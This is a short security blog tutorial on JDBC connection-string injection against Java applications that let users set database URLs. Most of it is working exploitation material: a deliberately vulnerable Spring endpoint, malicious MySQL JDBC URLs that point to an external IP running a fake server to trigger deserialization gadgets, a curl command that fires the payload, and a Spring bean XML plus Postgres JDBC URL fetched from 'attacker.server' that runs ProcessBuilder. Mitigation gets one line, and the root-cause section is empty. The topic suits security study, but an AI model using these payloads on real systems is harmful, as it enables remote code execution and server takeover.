JDBC Injection to Remote Code Execution
Contents:
- What is JDBC Injection
- Vulnerable Code Signature
- Exploitation
- Root Cause Analysis
- Mitigation
- Building Own Malicious MySql Server
- Exploiting Postgres Drivers
What is JDBC Injection:
JDBC Injection refers to an attack where the attacker can control the JDBC Connection strings and which which the attacker can gain remote Code Execution leading to complete compromise of the application.
But Why any application will let you do that?
Think of applications such as Oracle's WebLogic.
Application as this let you configure the Database you want you application to use.
And for that it needs to take the JDBC string from you.
Apart from this application there are many other applications from vendors like VMware , Oracle, Nutanix , Apache which lets you set the JDBC url.
So depending on the business logic your application may ask the user to configure JDBC Strings which can be abused to gain code execution given certain conditions are meth(Which we will discuss on RCA Section)
Vulnerable Code Signature:
The vulnerable code signature more or les looks like below.
@RestController
public class newtest {
@GetMapping("/jdbcdata")
public void test(@RequestParam String jstr)
{
try{
String url=jstr;
Connection conn = DriverManager.getConnection(url);
}catch(Exception e)
{
e.printStackTrace();
}
}
}
jstr which has been taken from the user has been assigned to urlpassed to DriverManager.getConnection().
The final sink function here is the DriverManager.getConnection().
Exploitation:
To exploit this flaw we have to set up a fake mysql server which is respond with a Malicious Serialized object which upon getting deserialized will give us code execution.
Note: The exploitation depends on the JDK version and available gadgets.
So lets download a fake mysql server from the github.
java -jar fake-mysql-cli-0.0.4.jar
jdbc:mysql://68.183.70.210:3308/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=deser_<gadget_name>_<binary_name>
jdbc:mysql://68.183.70.210:3308/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=deser_CB_notepad.exe
java -jar fake-mysql-cli-0.0.4.jar
curl http://localhost:8080//jdbcdata?jstr=jdbc:mysql://68.183.70.210:3308/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=deser_CC31_calc.exe
Root Cause Analysis
Mitigation:
To fix these issues update your JDBC Drivers to the latest Versions.
Building Own Malicious Server
Exploiting Postgres Driver
Instead of Mysql if the Application uses Postgres Connector then we can exploit it using the followsing steps
- Host a bean xml file with the following contents
- Pass the below JDBC Url to the target application
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder">
<constructor-arg>
<list>
<value>calc.exe</value>
</list>
</constructor-arg>
<property name="whatever" value="#{ pb.start() }" />
</bean>
</beans>
jdbc:postgresql://canbeanything/saas?&socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://attacker.server:9001/test.xml
Note: The attack will only work if the Postgres JDBC Connector versions are >= 9.4.1208, < 42.2.25 ,>= 42.3.0, < 42.3.2
Thats it For this Blog.
Thanks For Reading.
Happy Hacking.
You can connect with me at: